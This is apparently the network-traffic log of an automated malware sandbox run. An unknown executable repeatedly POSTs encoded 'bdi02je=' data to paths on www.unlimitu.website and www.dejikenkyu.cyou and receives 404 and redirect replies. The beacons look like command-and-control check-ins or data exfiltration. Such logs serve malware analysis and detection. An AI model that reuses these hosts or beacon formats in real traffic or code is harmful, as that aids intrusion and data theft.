                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 62 61 4f 6c 48 44 7a 4d 35 42 30 39 63 42 49 64 54 4e 6b 33 64 64 54 36 74 4c 57 34 6f 35 6b 73 31 45 5a 6b 64 74 44 4b 75 4a 2b 61 6a 34 72 2b 32 58 4a 61 73 2b 6c 7a 42 31 30 76 41 4d 73 2b 38 6b 45 63 54 37 61 5a 73 72 45 4b 77
                                                          Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_baOlHDzM5B09cBIdTNk3ddT6tLW4o5ks1EZkdtDKuJ+aj4r+2XJas+lzB10vAMs+8kEcT7aZsrEKw
                                                          Jan 10, 2025 23:06:04.680180073 CET | 1236 | IN | Data Raw: 57 44 74 51 7a 38 76 62 41 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                          Data Ascii: WDtQz8vbA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><script
                                                          Jan 10, 2025 23:06:04.680191040 CET | 1131 | IN | Data Raw: 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0d 0a 20
                                                          Data Ascii: "NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-wid


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          5 | 192.168.2.9 | 49980 | 209.74.79.40 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:09.734184027 CET | 757 | OUT | POST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 4a 41 31 30 42 2b 44 65 39 6f 74 32 6c 57 62 39 4c 6d 55 78 6d 57 49 6a 71 70 58 79 58 38 2f 72 64 57 48 38 52 74 43 57 35 41 72 5a 45 39 59 5a 68 47 38 53 6c 33 49 65 45 4b 42 64 42 4c 56 52 44 5a 61 6f 6a 46 31 52 79 73 45 34 46 6a 37 6f 49 65 5a 44 2f 53 31 4e 51 41 42 34 47 2f 65 39 59 53 35 44 57 2f 64 42 66 6d 74 2f 43 71 79 78 4c 76 6b 71 4e 66 36 52 50 44 74 5a 43 33 57 30 56 54 6d 55 7a 33 43 77 5a 56 7a 54 7a 5a 42 65 54 6b 50 63 4c 39 48 42 39 5a 6c 46 71 32 71 62 67 43 5a 59 71 6f 57 36 62 44 54 74 6c 45 44 6f
                                                          Data Ascii: bdi02je=OyazLRP9ZWxtJA10B+De9ot2lWb9LmUxmWIjqpXyX8/rdWH8RtCW5ArZE9YZhG8Sl3IeEKBdBLVRDZaojF1RysE4Fj7oIeZD/S1NQAB4G/e9YS5DW/dBfmt/CqyxLvkqNf6RPDtZC3W0VTmUz3CwZVzTzZBeTkPcL9HB9ZlFq2qbgCZYqoW6bDTtlEDo
                                                          Jan 10, 2025 23:06:10.322408915 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:10 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.9 | 49981 | 209.74.79.40 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:12.294816971 CET | 781 | OUT | POST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 49 6a 74 30 4e 39 72 65 31 6f 74 78 70 32 62 39 51 57 55 39 6d 57 4d 6a 71 74 50 69 58 50 58 72 64 7a 37 38 53 73 43 57 30 67 72 5a 50 64 59 59 2b 57 38 5a 6c 33 30 57 45 4c 39 64 42 4c 42 52 44 62 53 6f 69 79 5a 65 7a 38 45 36 63 54 37 71 48 2b 5a 44 2f 53 31 4e 51 41 56 42 47 2f 47 39 59 42 52 44 58 65 64 65 42 57 74 38 56 61 79 78 63 66 6b 6d 4e 66 36 2f 50 43 42 2f 43 31 2b 30 56 53 57 55 7a 6a 57 7a 57 56 7a 5a 2b 35 41 76 53 6d 2b 69 4e 39 4f 64 32 36 70 5a 2b 45 75 62 6a 6a 6c 47 37 61 66 68 4f 55 54 4b 69 6a 4b 41 33 63 39 4e 30 79 37 61 55 4a 41 51 7a 65 39 68 37 69 50 65 35 77 3d 3d
                                                          Data Ascii: bdi02je=OyazLRP9ZWxtIjt0N9re1otxp2b9QWU9mWMjqtPiXPXrdz78SsCW0grZPdYY+W8Zl30WEL9dBLBRDbSoiyZez8E6cT7qH+ZD/S1NQAVBG/G9YBRDXedeBWt8VayxcfkmNf6/PCB/C1+0VSWUzjWzWVzZ+5AvSm+iN9Od26pZ+EubjjlG7afhOUTKijKA3c9N0y7aUJAQze9h7iPe5w==
                                                          Jan 10, 2025 23:06:12.865439892 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:12 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.9 | 49982 | 209.74.79.40 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:14.845164061 CET | 1794 | OUT | POST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 49 6a 74 30 4e 39 72 65 31 6f 74 78 70 32 62 39 51 57 55 39 6d 57 4d 6a 71 74 50 69 58 4a 50 72 64 6c 76 38 51 50 71 57 37 41 72 5a 54 4e 59 64 2b 57 38 2b 6c 33 73 53 45 4c 77 69 42 49 35 52 43 34 4b 6f 72 67 68 65 35 38 45 36 55 7a 37 72 49 65 5a 57 2f 52 4e 42 51 41 46 42 47 2f 47 39 59 45 56 44 42 2f 64 65 44 57 74 2f 43 71 79 48 4c 76 6c 35 4e 63 4b 4a 50 43 45 45 44 45 65 30 55 78 2b 55 2f 77 75 7a 62 56 7a 66 39 35 41 33 53 6d 79 48 4e 39 44 6b 32 35 31 6a 2b 47 4f 62 7a 32 41 4f 6b 5a 6a 35 4b 58 66 68 30 6b 36 4a 35 4c 5a 59 78 77 4b 52 56 6f 4d 73 6e 76 30 42 32 47 4f 76 74 4b 59 37 4f 75 56 63 4c 63 67 36 6e 71 63 6b 74 34 4c 33 70 4d 51 68 4e 56 64 33 4e 68 49 31 68 43 77 56 4c 42 66 62 73 66 51 51 30 4f 7a 39 70 66 71 6b 76 34 6f 57 42 39 43 41 4c 31 65 6c 48 52 38 70 46 30 6e 46 54 6c 34 77 79 4a 4c 37 4a 37 75 46 4f 46 4d 39 63 66 41 56 64 34 48 47 68 45 4f 73 4c 35 6d 78 78 63 68 47 66 79 39 62 33 57 77 67 72 4f 32 6e 59 46 [TRUNCATED]
                                                          Data Ascii: bdi02je=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 [TRUNCATED]
                                                          Jan 10, 2025 23:06:15.413546085 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:15 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.9 | 49983 | 209.74.79.40 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:17.386873007 CET | 485 | OUT | GET /bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:17.983237982 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:17 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.9 | 49984 | 104.21.96.1 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:37.283664942 CET | 754 | OUT | POST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 51 33 42 41 47 53 39 66 30 6f 32 63 78 30 64 64 69 73 59 55 45 39 7a 50 75 64 43 51 65 75 37 30 2f 69 66 7a 44 4d 4e 4c 45 79 54 66 51 54 63 4b 6c 66 57 41 32 56 41 6a 6d 41 75 72 76 64 59 34 38 35 64 79 36 69 65 4b 78 6b 36 43 52 65 76 4c 46 7a 55 71 64 73 39 62 41 37 4b 4a 52 51 44 5a 6b 6d 64 45 2b 5a 6d 49 47 43 56 6b 48 44 79 48 66 38 2f 53 77 6d 2b 34 58 55 48 61 76 71 51 79 66 6d 79 71 35 71 41 73 31 4e 5a 48 68 2f 62 70 77 63 75 4b 33 50 48 36 65 31 49 70 76 64 34 4e 58 5a 76 61 72 68 71 52 4c 5a 42 6e 4b 4e 72 32 35 43 2f 31 4d 4a 59 77 4d 4b 6e 48
                                                          Data Ascii: bdi02je=Q3BAGS9f0o2cx0ddisYUE9zPudCQeu70/ifzDMNLEyTfQTcKlfWA2VAjmAurvdY485dy6ieKxk6CRevLFzUqds9bA7KJRQDZkmdE+ZmIGCVkHDyHf8/Swm+4XUHavqQyfmyq5qAs1NZHh/bpwcuK3PH6e1Ipvd4NXZvarhqRLZBnKNr25C/1MJYwMKnH
                                                          Jan 10, 2025 23:06:38.221787930 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=df7kPOZ9cskvuTWt4nFk8vX5LFGkcLcdMYjksjnhIyMAmJu5jB1EEPh5VVv8BdBSlIgEbnhA%2BabKkIJHpSXpENw1v3JKgxSLIo8iZhIiCUNW1JAT3Ge8%2F7i%2B3prAhjkwU0JsSbi%2B"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9ad9db772a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=3&los
                                                          Data Raw:
                                                          Data Ascii:
                                                          Jan 10, 2025 23:06:38.221834898 CET | 120 | IN | Data Raw: 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 37 35 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 31 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63
                                                          Data Ascii: =0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.9 | 49985 | 104.21.96.1 | 80 | 5636 | C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jan 10, 2025 23:06:39.830147982 CET | 778 | OUT | POST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 51 33 42 41 47 53 39 66 30 6f 32 63 77 58 56 64 35 4c 73 55 56 64 7a 4d 6c 39 43 51 58 4f 37 76 2f 69 54 7a 44 4a 74 68 48 41 6e 66 51 33 59 4b 2f 61 71 41 34 31 41 6a 75 67 75 79 68 39 5a 30 38 35 5a 41 36 69 79 4b 78 69 57 43 52 62 54 4c 46 6b 41 70 50 4d 39 5a 49 62 4b 4c 56 51 44 5a 6b 6d 64 45 2b 64 32 69 47 43 4e 6b 41 79 43 48 65 64 2f 52 73 32 2b 37 57 55 48 61 6c 36 51 32 66 6d 7a 39 35 72 4d 47 31 50 52 48 68 2f 72 70 77 4a 53 46 35 50 48 34 61 31 4a 64 6b 64 59 49 4d 72 58 51 71 77 4b 34 65 5a 56 50 45 4d 58 6f 6f 77 32 75 5a 65 59 58 4c 74 75 76 6a 35 34 47 67 49 68 45 52 54 68 6a 78 39 4d 77 4c 39 44 6b 4d 41 3d 3d
                                                          Data Ascii: bdi02je=Q3BAGS9f0o2cwXVd5LsUVdzMl9CQXO7v/iTzDJthHAnfQ3YK/aqA41Ajuguyh9Z085ZA6iyKxiWCRbTLFkApPM9ZIbKLVQDZkmdE+d2iGCNkAyCHed/Rs2+7WUHal6Q2fmz95rMG1PRHh/rpwJSF5PH4a1JdkdYIMrXQqwK4eZVPEMXoow2uZeYXLtuvj54GgIhERThjx9MwL9DkMA==
                                                          Jan 10, 2025 23:06:40.733803034 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojwNLhQg4VudMxG956nDxz5uLcw3lBQT4%2FxfJLXY8gMM4LjQhip4lJzWDu403Hx9v0AzNZ4ncQ%2F1xzQTQXAC8RBYODw895lY7fn4EKv0LlG6G2xCSjMJwvMqnvW6yPkbROustMgB"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9bd6a2b72a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2005&min_rtt=2005&rtt_var=1002&sent=1&recv=3&lost=0
